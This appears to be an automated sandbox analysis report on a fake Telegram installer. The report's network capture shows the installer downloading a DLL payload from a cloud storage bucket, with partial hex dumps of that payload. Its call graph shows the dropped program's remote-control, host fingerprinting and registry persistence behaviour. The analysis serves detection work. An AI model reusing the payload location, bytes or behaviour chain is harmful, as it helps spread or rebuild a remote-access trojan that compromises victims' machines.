                                          Aug 4, 2024 12:47:08.258450985 CEST1236INData Raw: 74 da 66 ff c6 41 b8 06 00 00 00 0f b7 d6 48 8b cb ff 15 02 f1 01 00 48 85 c0 0f 84 85 00 00 00 45 8b c7 48 8b d0 48 8b cb e8 bb 34 00 00 48 8b f8 48 85 c0 74 6f 0f b7 18 8b d5 49 8b 06 44 0f b7 cb 8b 48 f4 2b 50 f8 2b cb 0b d1 7d 11 8b d3 49 8b
                                          Data Ascii: tfAHHEHH4HHtoIDH+P+}IIDLGEHHtt@tF"tAPu&I;X4X3IfX93.@WAH\$VWAWH
                                          Aug 4, 2024 12:47:08.263676882 CEST1236INData Raw: 89 44 24 30 48 85 c0 74 0e 66 44 89 30 eb 08 49 8b c6 4c 89 74 24 30 48 85 c0 0f 84 93 01 00 00 48 89 3b 0f b6 05 3b fb 02 00 88 44 24 22 45 8b ee 45 32 ff 44 88 7c 24 21 40 32 ed 40 88 6c 24 20 66 44 39 2f 0f 84 f8 02 00 00 41 bc 27 00 00 00 0f
                                          Data Ascii: D$0HtfD0ILt$0HH;;D$"EE2D|$!@2@l$ fD9/A'@A<EutHHHt`HH;uXHHHHHHHLt$8EEH'HL$(AD|$!HfD; uO@u@@l$
                                          Aug 4, 2024 12:47:08.702128887 CEST105OUTGET /arphaDump64.dll HTTP/1.1
                                          Connection: Keep-Alive
                                          Host: jerryrat2024.oss-cn-beijing.aliyuncs.com
                                          Aug 4, 2024 12:47:09.029823065 CEST1236INHTTP/1.1 200 OK
                                          Server: AliyunOSS
                                          Date: Sun, 04 Aug 2024 10:47:08 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 2199488
                                          Connection: keep-alive
                                          x-oss-request-id: 66AF5C2C0BFF4B3534D077DF
                                          Accept-Ranges: bytes
                                          ETag: "5D165E30CDB59FDCCBD2ACE554EF3DF7"
                                          Last-Modified: Sun, 21 Jul 2024 04:01:27 GMT
                                          x-oss-object-type: Normal
                                          x-oss-hash-crc64ecma: 10738669038091672703
                                          x-oss-storage-class: Standard
                                          x-oss-ec: 0048-00000113
                                          Content-Disposition: attachment
                                          x-oss-force-download: true
                                          Content-MD5: XRZeMM21n9zL0qzlVO899w==
                                          x-oss-server-time: 3
                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 68 2d 29 83 09 43 7a 83 09 43 7a 83 09 43 7a 9d 5b c7 7a a6 09 43 7a 9d 5b c0 7a c4 09 43 7a 9d 5b d6 7a 89 09 43 7a a4 cf 38 7a 80 09 43 7a 83 09 42 7a cd 09 43 7a 9d 5b c9 7a 80 09 43 7a 9d 5b d1 7a 82 09 43 7a 9d 5b d2 7a 82 09 43 7a 52 69 63 68 83 09 43 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 23 83 9c 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 09 00 00 84 00 00 00 de 20 00 00 00 00 00 34 1b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 c0 21 00 00 04 00 00 16 7b 21 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 [TRUNCATED]
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$h-)CzCzCz[zCz[zCz[zCz8zCzBzCz[zCz[zCz[zCzRichCzPEd#f" 4!{!@( f!)!P.text `.rdatac24@@.data"@.pdata@@.rsrc


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:06:46:58
                                          Start date:04/08/2024
                                          Path:C:\Users\user\Desktop\Telegrm2.69.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\Telegrm2.69.exe"
                                          Imagebase:0x7ff7aa310000
                                          File size:27'643'656 bytes
                                          MD5 hash:30D73384015546E788046F3D30B50B20
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:2
                                          Start time:06:47:18
                                          Start date:04/08/2024
                                          Path:C:\ProgramData\icret\arphaCrashReport64.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\ProgramData\icret\arphaCrashReport64.exe"
                                          Imagebase:0x7ff6e2d50000
                                          File size:238'384 bytes
                                          MD5 hash:8B5D51DF7BBD67AEB51E9B9DEE6BC84A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 0%, ReversingLabs
                                          • Detection: 0%, Virustotal, Browse
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:5
                                          Start time:06:47:26
                                          Start date:04/08/2024
                                          Path:C:\ProgramData\icret\arphaCrashReport64.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\ProgramData\icret\arphaCrashReport64.exe"
                                          Imagebase:0x7ff6e2d50000
                                          File size:238'384 bytes
                                          MD5 hash:8B5D51DF7BBD67AEB51E9B9DEE6BC84A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:3.5%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:36.3%
                                            Total number of Nodes:614
                                            Total number of Limit Nodes:32
                                            execution_graph 24896 2337ef0 24897 2337efa 24896->24897 24898 2337f25 socket 24897->24898 24907 23380b6 24897->24907 24899 2337f3d 24898->24899 24898->24907 24900 2337f82 connect 24899->24900 24900->24900 24901 2337f9c send 24900->24901 24902 2337fb7 recv 24901->24902 24901->24907 24903 2337fe0 NtAllocateVirtualMemory NtAllocateVirtualMemory 24902->24903 24902->24907 24904 2338060 recv 24903->24904 24905 2338079 24904->24905 24904->24907 24905->24904 24906 23380ad closesocket 24905->24906 24906->24907 24908 30a1e80 24909 30a219d 24908->24909 24926 30a1eb3 24908->24926 24910 30a1ed0 SleepEx 24911 30a1ee5 GetCurrentThreadId 24910->24911 24910->24926 24918 30a1ef3 24911->24918 24914 30c2478 63 API calls 24915 30a1ff7 VirtualAlloc 24914->24915 24924 30a1f43 ctype 24915->24924 24916 30a1f9f VirtualFree 24916->24924 24917 30c2478 63 API calls 24919 30a20a4 VirtualAlloc 24917->24919 24918->24924 24927 30a2900 24918->24927 24933 30a1370 24918->24933 24919->24924 24921 30a2041 VirtualFree 24921->24924 24923 30a2173 GetCurrentThreadId 24923->24926 24924->24914 24924->24916 24924->24917 24924->24918 24924->24921 24925 30a20ee VirtualFree 24924->24925 24942 30c2478 24924->24942 24925->24924 24926->24909 24926->24910 24928 30a298e 24927->24928 24931 30a2938 24927->24931 24929 30a29b0 24928->24929 24930 30a2992 send 24928->24930 24929->24918 24930->24928 24930->24929 24931->24928 24931->24929 24932 30a2950 send 24931->24932 24932->24931 24934 30a1380 24933->24934 24935 30a138a 24934->24935 24936 30c2478 63 API calls 24934->24936 24935->24923 24937 30a13af 24936->24937 24938 30a13c9 VirtualAlloc 24937->24938 24939 30a13bc 24937->24939 24940 30a13f3 ctype 24938->24940 24939->24923 24941 30a1409 VirtualFree 24940->24941 24941->24923 24943 30c24b4 24942->24943 24945 30a1f55 VirtualAlloc 24942->24945 24943->24945 24946 30c33d8 63 API calls 4 library calls 24943->24946 24945->24924 24946->24945 24947 2db0091 24948 2db0099 24947->24948 24949 2db00db NtAllocateVirtualMemory 24948->24949 24950 2db0383 24949->24950 24951 2db012e 24949->24951 24951->24950 24952 2db02cc LdrLoadDll 24951->24952 24952->24951 24953 30a21c0 24962 30a21f2 ctype 24953->24962 24954 30a22d4 24966 30b2c00 24954->24966 24955 30a2240 select 24955->24962 24963 30a22a1 24955->24963 24957 30a236c 24958 30a2264 recv 24959 30a22b9 24958->24959 24958->24962 24965 30a2380 71 API calls ctype 24959->24965 24960 30a22e8 setsockopt CancelIo closesocket SetEvent 24960->24954 24962->24954 24962->24955 24962->24958 24962->24963 24964 30b3200 62 API calls _errno 24962->24964 24963->24954 24963->24960 24964->24962 24965->24962 24967 30b2c09 24966->24967 24968 30b2c14 24967->24968 24969 30b4554 RtlCaptureContext RtlLookupFunctionEntry 24967->24969 24968->24957 24970 30b45d9 24969->24970 24971 30b4598 RtlVirtualUnwind 24969->24971 24972 30b45fb IsDebuggerPresent 24970->24972 24971->24972 24977 30b9984 24972->24977 24974 30b465a SetUnhandledExceptionFilter UnhandledExceptionFilter 24975 30b4678 _cftoe_l 24974->24975 24976 30b4682 GetCurrentProcess TerminateProcess 24974->24976 24975->24976 24976->24957 24977->24974 24978 30aeb40 24987 30b23a0 24978->24987 24980 30aeb8b 24982 30aebb1 24980->24982 24999 30a2750 71 API calls ctype 24980->24999 24981 30b23a0 82 API calls 24983 30aeb55 24981->24983 24983->24980 24983->24981 24985 30aeb70 SleepEx 24983->24985 24986 30b23a0 82 API calls 24985->24986 24986->24983 25000 30b82c0 24987->25000 24990 30b241b _recalloc 24992 30b2430 wsprintfA 24990->24992 24991 30b2409 lstrcpy 24991->24990 25002 30a14c0 24992->25002 24996 30b247b 24997 30b2c00 _cftoe_l 8 API calls 24996->24997 24998 30b248f 24997->24998 24998->24983 24999->24982 25001 30b23ed GetComputerNameA 25000->25001 25001->24990 25001->24991 25003 30a1515 _recalloc 25002->25003 25004 30a153f 7 API calls 25003->25004 25005 30a15dc 25004->25005 25006 30a15d4 25004->25006 25007 30a177c RegCloseKey 25005->25007 25008 30a1730 RegQueryValueExA 25005->25008 25009 30a15f1 25005->25009 25006->25007 25012 30a178e 25007->25012 25008->25007 25021 30a1603 __wtomb_environ 25008->25021 25010 30a15fa 25009->25010 25011 30a16e8 25009->25011 25013 30a1697 RegQueryValueExA 25010->25013 25010->25021 25011->25007 25020 30a1719 wsprintfA 25011->25020 25015 30a179c 25012->25015 25016 30a1793 FreeLibrary 25012->25016 25013->25007 25018 30a16ce wsprintfA 25013->25018 25014 30a176e lstrcpy 25014->25006 25017 30b2c00 _cftoe_l 8 API calls 25015->25017 25016->25015 25019 30a17ae 25017->25019 25018->25006 25019->24996 25022 30b4298 65 API calls __tzset 25019->25022 25020->25006 25021->25007 25021->25014 25022->24996 25023 30aed81 25024 30aed90 25023->25024 25033 30b3290 25024->25033 25026 30aeda7 _recalloc 25027 30aedba GetLastInputInfo GetTickCount GetForegroundWindow 25026->25027 25028 30aee09 25027->25028 25029 30aee15 25027->25029 25045 30a2f20 9 API calls 25028->25045 25031 30aee2d 25029->25031 25046 30a2750 71 API calls ctype 25029->25046 25035 30b329b 25033->25035 25036 30b32b4 25035->25036 25040 30b32ba std::_Facet_Register 25035->25040 25047 30b5728 25035->25047 25064 30b57e8 RtlDecodePointer 25035->25064 25036->25026 25038 30b330b 25066 30b3854 62 API calls std::exception::operator= 25038->25066 25040->25038 25065 30b3f8c 72 API calls _cinit 25040->25065 25041 30b331c 25067 30b581c RaiseException ctype 25041->25067 25044 30b3332 25045->25029 25046->25031 25048 30b57bc 25047->25048 25060 30b5740 25047->25060 25075 30b57e8 RtlDecodePointer 25048->25075 25050 30b5778 RtlAllocateHeap 25054 30b57b1 25050->25054 25050->25060 25051 30b57c1 25053 30b3200 _errno 61 API calls 25051->25053 25053->25054 25054->25035 25055 30b57a1 25072 30b3200 25055->25072 25059 30b57a6 25062 30b3200 _errno 61 API calls 25059->25062 25060->25050 25060->25055 25060->25059 25063 30b5758 25060->25063 25071 30b57e8 RtlDecodePointer 25060->25071 25062->25054 25063->25050 25068 30ba4a4 62 API calls 2 library calls 25063->25068 25069 30ba244 62 API calls 4 library calls 25063->25069 25070 30b4f94 GetModuleHandleW GetProcAddress ExitProcess malloc 25063->25070 25064->25035 25065->25038 25066->25041 25067->25044 25068->25063 25069->25063 25071->25060 25076 30b48d4 GetLastError FlsGetValue 25072->25076 25074 30b3209 25074->25059 25075->25051 25077 30b48fa 25076->25077 25078 30b4942 SetLastError 25076->25078 25088 30b537c 25077->25088 25078->25074 25081 30b490f FlsSetValue 25082 30b493b 25081->25082 25083 30b4925 25081->25083 25102 30b3d28 62 API calls 2 library calls 25082->25102 25093 30b481c 25083->25093 25086 30b4940 25086->25078 25090 30b53a1 25088->25090 25091 30b4907 25090->25091 25092 30b53bf Sleep 25090->25092 25103 30ba4e8 25090->25103 25091->25078 25091->25081 25092->25090 25092->25091 25112 30b9b98 25093->25112 25095 30b4875 25096 30b9a98 type_info::_Type_info_dtor RtlLeaveCriticalSection 25095->25096 25097 30b488a 25096->25097 25098 30b9b98 _lock 62 API calls 25097->25098 25099 30b4894 25098->25099 25100 30b9a98 type_info::_Type_info_dtor RtlLeaveCriticalSection 25099->25100 25101 30b48c6 GetCurrentThreadId 25100->25101 25101->25078 25102->25086 25104 30ba4fd 25103->25104 25109 30ba51a 25103->25109 25105 30ba50b 25104->25105 25104->25109 25107 30b3200 _errno 61 API calls 25105->25107 25106 30ba532 RtlAllocateHeap 25108 30ba510 25106->25108 25106->25109 25107->25108 25108->25090 25109->25106 25109->25108 25111 30b57e8 RtlDecodePointer 25109->25111 25111->25109 25113 30b9bc7 RtlAcquirePebLock 25112->25113 25114 30b9bb6 25112->25114 25118 30b9ab0 62 API calls 6 library calls 25114->25118 25116 30b9bbb 25116->25113 25119 30b52d4 62 API calls 3 library calls 25116->25119 25118->25116 25120 30b0180 25185 30ad960 25120->25185 25122 30b01fe 25123 30ad960 73 API calls 25122->25123 25124 30b023e 25123->25124 25125 30ad960 73 API calls 25124->25125 25126 30b0263 25125->25126 25127 30ad960 73 API calls 25126->25127 25128 30b0294 25127->25128 25129 30ad960 73 API calls 25128->25129 25130 30b02b8 memchr 25129->25130 25170 30b099d 25130->25170 25191 30b0b40 25130->25191 25132 30b043e ctype 25194 30b38a4 GetSystemTimeAsFileTime 25132->25194 25135 30b2c00 _cftoe_l 8 API calls 25137 30b0b13 25135->25137 25138 30b04d5 25140 30b050e 25138->25140 25199 30b4250 25138->25199 25202 30a4a30 25140->25202 25142 30b053e CreateDirectoryA 25143 30b0b40 73 API calls 25142->25143 25144 30b0582 25143->25144 25220 30b0fe0 25144->25220 25148 30b05ba 25149 30b0b40 73 API calls 25148->25149 25150 30b05d1 25149->25150 25235 30ad560 25150->25235 25152 30b05fc 25248 30afcf0 25152->25248 25155 30b0b40 73 API calls 25156 30b0645 25155->25156 25157 30b0fe0 73 API calls 25156->25157 25158 30b0662 25157->25158 25159 30b10a0 73 API calls 25158->25159 25161 30b067e 25159->25161 25160 30b06dd 25162 30b38a4 GetSystemTimeAsFileTime 25160->25162 25160->25170 25163 30b0b40 73 API calls 25161->25163 25164 30b07bd 25162->25164 25165 30b0698 25163->25165 25166 30b4238 62 API calls 25164->25166 25167 30ad560 73 API calls 25165->25167 25168 30b07c5 25166->25168 25169 30b06c7 25167->25169 25172 30b4250 rand 62 API calls 25168->25172 25173 30b07fd 25168->25173 25171 30afcf0 78 API calls 25169->25171 25170->25135 25171->25160 25172->25168 25174 30b0b40 73 API calls 25173->25174 25175 30b081b 25174->25175 25176 30b0fe0 73 API calls 25175->25176 25177 30b082e 25176->25177 25178 30b10a0 73 API calls 25177->25178 25180 30b0841 ctype 25178->25180 25179 30b091f RegOpenKeyExA 25179->25170 25181 30b094a RegSetValueExA 25179->25181 25180->25179 25182 30b0983 25181->25182 25183 30b0992 RegCloseKey 25181->25183 25265 30b22c0 25 API calls 2 library calls 25182->25265 25183->25170 25187 30ad97d 25185->25187 25186 30ad9e9 25189 30ada02 ctype 25186->25189 25267 30ad750 73 API calls 3 library calls 25186->25267 25187->25186 25266 30bfa0c 63 API calls 2 library calls 25187->25266 25189->25122 25192 30ad560 73 API calls 25191->25192 25193 30b0b68 25192->25193 25193->25132 25195 30b04cd 25194->25195 25196 30b4238 25195->25196 25268 30b4958 25196->25268 25200 30b4958 _getptd 62 API calls 25199->25200 25201 30b4259 25200->25201 25201->25138 25203 30a4aa7 25202->25203 25207 30a4a4d 25202->25207 25204 30a4ac3 25203->25204 25274 30bfa0c 63 API calls 2 library calls 25203->25274 25206 30a4ae8 25204->25206 25210 30a4afd ctype 25204->25210 25275 30bfa0c 63 API calls 2 library calls 25204->25275 25206->25210 25276 30ad750 73 API calls 3 library calls 25206->25276 25207->25203 25211 30a4a76 25207->25211 25210->25142 25212 30a4cc6 25211->25212 25277 30bfa68 63 API calls 2 library calls 25211->25277 25214 30a4ced 25212->25214 25278 30bfa0c 63 API calls 2 library calls 25212->25278 25216 30a4d12 25214->25216 25219 30a4d24 ctype 25214->25219 25279 30bfa0c 63 API calls 2 library calls 25214->25279 25216->25219 25280 30ad750 73 API calls 3 library calls 25216->25280 25219->25142 25221 30b103d 25220->25221 25222 30b102f 25220->25222 25281 30a4c90 25221->25281 25222->25221 25291 30ad890 73 API calls ctype 25222->25291 25224 30b106a 25226 30a4a30 73 API calls 25224->25226 25227 30b059f 25226->25227 25228 30b10a0 25227->25228 25229 30b10cb 25228->25229 25230 30b10e4 25228->25230 25229->25230 25232 30b10d7 25229->25232 25231 30a4c90 73 API calls 25230->25231 25234 30b10e2 25231->25234 25296 30b1120 73 API calls ctype 25232->25296 25234->25148 25236 30ad592 25235->25236 25237 30ad586 25235->25237 25238 30ad5a2 25236->25238 25239 30ad5c1 25236->25239 25297 30bfa68 63 API calls 2 library calls 25237->25297 25298 30ad4b0 63 API calls ctype 25238->25298 25242 30ad5d3 25239->25242 25300 30bfa0c 63 API calls 2 library calls 25239->25300 25247 30ad5bc ctype 25242->25247 25301 30ad750 73 API calls 3 library calls 25242->25301 25243 30ad5af 25299 30ad4b0 63 API calls ctype 25243->25299 25247->25152 25249 30afd50 25248->25249 25250 30ad560 73 API calls 25249->25250 25264 30afd5d collate 25249->25264 25251 30afde1 25250->25251 25302 30afbb0 25251->25302 25253 30b2c00 _cftoe_l 8 API calls 25254 30b0169 25253->25254 25254->25155 25254->25160 25255 30afdee 25256 30ad560 73 API calls 25255->25256 25257 30afe65 25256->25257 25258 30afbb0 75 API calls 25257->25258 25259 30afe73 25258->25259 25260 30b0031 CreateFileA 25259->25260 25259->25264 25262 30b005d collate 25260->25262 25261 30b0117 FindCloseChangeNotification 25261->25264 25262->25261 25263 30b00e9 WriteFile 25262->25263 25263->25262 25264->25253 25265->25183 25266->25186 25267->25189 25269 30b48d4 __doserrno 62 API calls 25268->25269 25270 30b4963 25269->25270 25271 30b4245 25270->25271 25273 30b52d4 62 API calls 3 library calls 25270->25273 25271->25138 25274->25204 25275->25206 25276->25210 25277->25212 25278->25214 25279->25216 25280->25219 25282 30a4cba 25281->25282 25283 30a4cc6 25281->25283 25292 30bfa68 63 API calls 2 library calls 25282->25292 25285 30a4ced 25283->25285 25293 30bfa0c 63 API calls 2 library calls 25283->25293 25288 30a4d12 25285->25288 25290 30a4d24 ctype 25285->25290 25294 30bfa0c 63 API calls 2 library calls 25285->25294 25288->25290 25295 30ad750 73 API calls 3 library calls 25288->25295 25290->25224 25291->25221 25292->25283 25293->25285 25294->25288 25295->25290 25296->25234 25297->25236 25298->25243 25299->25247 25300->25242 25301->25247 25303 30afc0e MultiByteToWideChar 25302->25303 25305 30afc52 25303->25305 25306 30afc64 MultiByteToWideChar 25305->25306 25311 30b0b80 25306->25311 25308 30afc9e 25309 30b2c00 _cftoe_l 8 API calls 25308->25309 25310 30afcd5 25309->25310 25310->25255 25312 30b0bfe 25311->25312 25313 30b0b9d 25311->25313 25314 30b0c1a 25312->25314 25329 30bfa0c 63 API calls 2 library calls 25312->25329 25313->25312 25319 30b0bca 25313->25319 25316 30b0c48 25314->25316 25323 30b0c5d ctype 25314->25323 25330 30bfa0c 63 API calls 2 library calls 25314->25330 25316->25323 25331 30b1500 73 API calls 3 library calls 25316->25331 25320 30b0e06 25319->25320 25332 30bfa68 63 API calls 2 library calls 25319->25332 25322 30b0e2d 25320->25322 25333 30bfa0c 63 API calls 2 library calls 25320->25333 25325 30b0e5b 25322->25325 25328 30b0e70 ctype 25322->25328 25334 30bfa0c 63 API calls 2 library calls 25322->25334 25323->25308 25325->25328 25335 30b1500 73 API calls 3 library calls 25325->25335 25328->25308 25329->25314 25330->25316 25331->25323 25332->25320 25333->25322 25334->25325 25335->25328 25336 30ae9d8 25337 30ae9e2 25336->25337 25341 30b30bc 25337->25341 25340 30ae9ff 25342 30b30e7 25341->25342 25345 30b30fc 25341->25345 25343 30b3200 _errno 62 API calls 25342->25343 25344 30b30ec 25343->25344 25359 30b5708 25344->25359 25347 30b537c __onexitinit 62 API calls 25345->25347 25349 30b3110 25347->25349 25348 30ae9f6 FindCloseChangeNotification 25348->25340 25350 30b3180 25349->25350 25352 30b4958 _getptd 62 API calls 25349->25352 25362 30b3d28 62 API calls 2 library calls 25350->25362 25354 30b311d 25352->25354 25353 30b3188 25353->25348 25363 30b3240 62 API calls 2 library calls 25353->25363 25355 30b481c __doserrno 62 API calls 25354->25355 25357 30b312c CreateThread 25355->25357 25357->25348 25358 30b3178 GetLastError 25357->25358 25372 30b303c 25357->25372 25358->25350 25364 30b5698 RtlDecodePointer 25359->25364 25362->25353 25363->25348 25365 30b56f7 25364->25365 25366 30b56d6 25364->25366 25371 30b5664 16 API calls _fltout2 25365->25371 25366->25348 25373 30b304a 25372->25373 25374 30b308a 25373->25374 25375 30b305e 25373->25375 25382 30b497c 62 API calls 4 library calls 25374->25382 25380 30b3071 GetLastError RtlExitUserThread 25375->25380 25381 30b3080 GetCurrentThreadId 25375->25381 25377 30b30b6 25383 30b3010 65 API calls 2 library calls 25377->25383 25379 30b30bb 25380->25381 25381->25377 25382->25377 25383->25379 25384 30b43f8 25386 30b441e 25384->25386 25385 30b445b 25388 30b4426 25385->25388 25390 30b42a4 118 API calls 25385->25390 25391 30b44a0 25385->25391 25386->25385 25386->25388 25392 30b42a4 25386->25392 25389 30b42a4 118 API calls 25389->25388 25390->25391 25391->25388 25391->25389 25393 30b4333 25392->25393 25394 30b42b6 25392->25394 25396 30b4337 25393->25396 25397 30b4384 25393->25397 25439 30b83f4 HeapCreate 25394->25439 25403 30b436e 25396->25403 25418 30b42bf 25396->25418 25453 30b9300 63 API calls free 25396->25453 25399 30b43df 25397->25399 25402 30b4389 25397->25402 25399->25418 25458 30b4ab0 64 API calls _freefls 25399->25458 25405 30b537c __onexitinit 62 API calls 25402->25405 25403->25418 25456 30b47f4 65 API calls free 25403->25456 25404 30b42cb _RTC_Initialize 25408 30b42cf 25404->25408 25417 30b42db GetCommandLineA 25404->25417 25409 30b439d 25405->25409 25407 30b4364 25454 30b47f4 65 API calls free 25407->25454 25445 30b844c HeapDestroy 25408->25445 25410 30b43a9 FlsSetValue 25409->25410 25409->25418 25414 30b43bf 25410->25414 25415 30b43d5 25410->25415 25419 30b481c __doserrno 62 API calls 25414->25419 25457 30b3d28 62 API calls 2 library calls 25415->25457 25416 30b4369 25455 30b844c HeapDestroy 25416->25455 25446 30b976c 67 API calls 2 library calls 25417->25446 25418->25385 25423 30b43c6 GetCurrentThreadId 25419->25423 25423->25418 25424 30b42ed 25447 30b902c 69 API calls __onexitinit 25424->25447 25426 30b42f9 25427 30b42fd 25426->25427 25428 30b4304 25426->25428 25448 30b47f4 65 API calls free 25427->25448 25449 30b9674 77 API calls 3 library calls 25428->25449 25431 30b4309 25432 30b431d 25431->25432 25450 30b9374 76 API calls 5 library calls 25431->25450 25438 30b4321 25432->25438 25452 30b9300 63 API calls free 25432->25452 25435 30b4312 25435->25432 25451 30b5078 73 API calls 2 library calls 25435->25451 25436 30b4331 25436->25427 25438->25418 25440 30b841c GetVersion 25439->25440 25441 30b42bb 25439->25441 25442 30b8440 25440->25442 25443 30b8426 HeapSetInformation 25440->25443 25441->25418 25444 30b4af0 70 API calls 2 library calls 25441->25444 25442->25441 25443->25442 25444->25404 25445->25418 25446->25424 25447->25426 25448->25408 25449->25431 25450->25435 25451->25432 25452->25436 25453->25407 25454->25416 25455->25403 25456->25418 25457->25418 25458->25418 25459 30a12b0 25460 30a12be 25459->25460 25461 30a12c6 25459->25461 25462 30c2478 63 API calls 25461->25462 25463 30a12ed VirtualAlloc 25462->25463 25464 30a1315 ctype 25463->25464 25465 30a1342 25464->25465 25466 30a1334 VirtualFree 25464->25466 25466->25465 25467 30a4530 GetModuleHandleA GetProcAddress 25468 30a47a8 25467->25468 25469 30a457f LoadLibraryA GetProcAddress 25467->25469 25472 30b2c00 _cftoe_l 8 API calls 25468->25472 25470 30a45ed 25469->25470 25471 30a45c1 VirtualProtect VirtualProtect 25469->25471 25492 30b21d0 25470->25492 25471->25470 25474 30a47c8 25472->25474 25476 30b23a0 82 API calls 25477 30a4615 25476->25477 25478 30a4621 25477->25478 25479 30a4646 25477->25479 25480 30b30bc 70 API calls 25478->25480 25481 30b30bc 70 API calls 25479->25481 25482 30a463d CloseHandle 25480->25482 25483 30a4662 CloseHandle 25481->25483 25482->25479 25484 30b23a0 82 API calls 25483->25484 25485 30a4677 25484->25485 25486 30a4687 25485->25486 25487 30b23a0 82 API calls 25485->25487 25502 30a3db0 25486->25502 25487->25486 25489 30a46d0 CreateThread WaitForSingleObject CloseHandle 25490 30b21d0 25 API calls 25489->25490 25505 30a3a90 25489->25505 25491 30a46a3 ctype 25490->25491 25491->25468 25491->25489 25491->25491 25493 30b2202 _recalloc 25492->25493 25494 30b2219 GetComputerNameA 25493->25494 25495 30b2247 _recalloc 25494->25495 25496 30b2235 lstrcpy 25494->25496 25497 30b225c wsprintfA 25495->25497 25496->25495 25498 30a14c0 22 API calls 25497->25498 25499 30b229b 25498->25499 25500 30b2c00 _cftoe_l 8 API calls 25499->25500 25501 30a45f9 lstrcpy 25500->25501 25501->25476 25503 30b21d0 25 API calls 25502->25503 25504 30a3dce ctype 25503->25504 25504->25491 25506 30a3aac __initmbctable 25505->25506 25533 30a19a0 10 API calls 2 library calls 25506->25533 25508 30a3aee GetTickCount64 25509 30a3d55 25508->25509 25515 30a3b04 25508->25515 25598 30a1ac0 11 API calls 25509->25598 25511 30a3d5f 25512 30b2c00 _cftoe_l 8 API calls 25511->25512 25514 30a3d70 25512->25514 25515->25509 25516 30a3b46 Sleep 25515->25516 25517 30a3b57 GetTickCount64 25515->25517 25534 30a1bf0 ResetEvent timeGetTime socket 25515->25534 25530 30a3bea 25516->25530 25548 30ae4a0 71 API calls 2 library calls 25517->25548 25522 30a3b79 25523 30a3c64 WaitForSingleObject Sleep WaitForSingleObject WaitForSingleObject Sleep 25522->25523 25525 30a3b93 setsockopt CancelIo closesocket SetEvent 25522->25525 25522->25530 25549 30a3560 25522->25549 25526 30a3cc8 TerminateThread WaitForSingleObject CloseHandle 25523->25526 25527 30a3ced Sleep 25523->25527 25524 30a3d3f GetTickCount64 25524->25509 25524->25515 25525->25530 25526->25527 25527->25530 25528 30a3c01 TerminateThread WaitForSingleObject CloseHandle 25529 30a3c26 Sleep 25528->25529 25529->25530 25530->25528 25530->25529 25531 30a3d10 CloseHandle 25530->25531 25532 30a3c44 CloseHandle 25530->25532 25596 30a1ac0 11 API calls 25530->25596 25597 30a19a0 10 API calls 2 library calls 25530->25597 25531->25530 25531->25531 25532->25530 25532->25532 25533->25508 25535 30a1c7d gethostbyname 25534->25535 25546 30a1c76 25534->25546 25536 30a1c8e htons connect 25535->25536 25535->25546 25537 30a1cc6 getsockname 25536->25537 25536->25546 25539 30b82c0 _recalloc 25537->25539 25538 30b2c00 _cftoe_l 8 API calls 25540 30a1e65 25538->25540 25541 30a1cfd inet_ntop setsockopt setsockopt setsockopt setsockopt 25539->25541 25540->25515 25542 30a1dfe 25541->25542 25543 30a1db7 WSAIoctl 25541->25543 25544 30b30bc 70 API calls 25542->25544 25543->25542 25545 30a1e29 25544->25545 25545->25546 25547 30b30bc 70 API calls 25545->25547 25546->25538 25547->25546 25548->25522 25550 30a35ab _recalloc 25549->25550 25599 30a3430 25550->25599 25553 30b21d0 25 API calls 25554 30a35e0 25553->25554 25555 30a35fa GetComputerNameA 25554->25555 25556 30a3607 25554->25556 25557 30a3612 GetCurrentProcessId LoadLibraryA GetProcAddress GetUserNameA 25555->25557 25556->25557 25607 30a3160 6 API calls 25557->25607 25560 30ad960 73 API calls 25561 30a36fd CreateToolhelp32Snapshot 25560->25561 25562 30b3290 std::_Facet_Register 73 API calls 25561->25562 25563 30a3716 25562->25563 25564 30a372b 25563->25564 25611 30a3080 Process32First 25563->25611 25618 30b3c68 62 API calls 2 library calls 25564->25618 25567 30a3751 25568 30b21d0 25 API calls 25567->25568 25569 30a375d lstrlen 25568->25569 25570 30a376d 25569->25570 25571 30a37c7 25569->25571 25572 30b38a4 GetSystemTimeAsFileTime 25570->25572 25621 30b3c68 62 API calls 2 library calls 25571->25621 25575 30a3777 25572->25575 25574 30a37dd 25576 30b21d0 25 API calls 25574->25576 25619 30b3c20 76 API calls 2 library calls 25575->25619 25578 30a37e9 25576->25578 25580 30a37fc 25578->25580 25581 30a3821 25578->25581 25579 30a3781 wsprintfA 25620 30b20e0 26 API calls 2 library calls 25579->25620 25583 30b21d0 25 API calls 25580->25583 25623 30a32f0 12 API 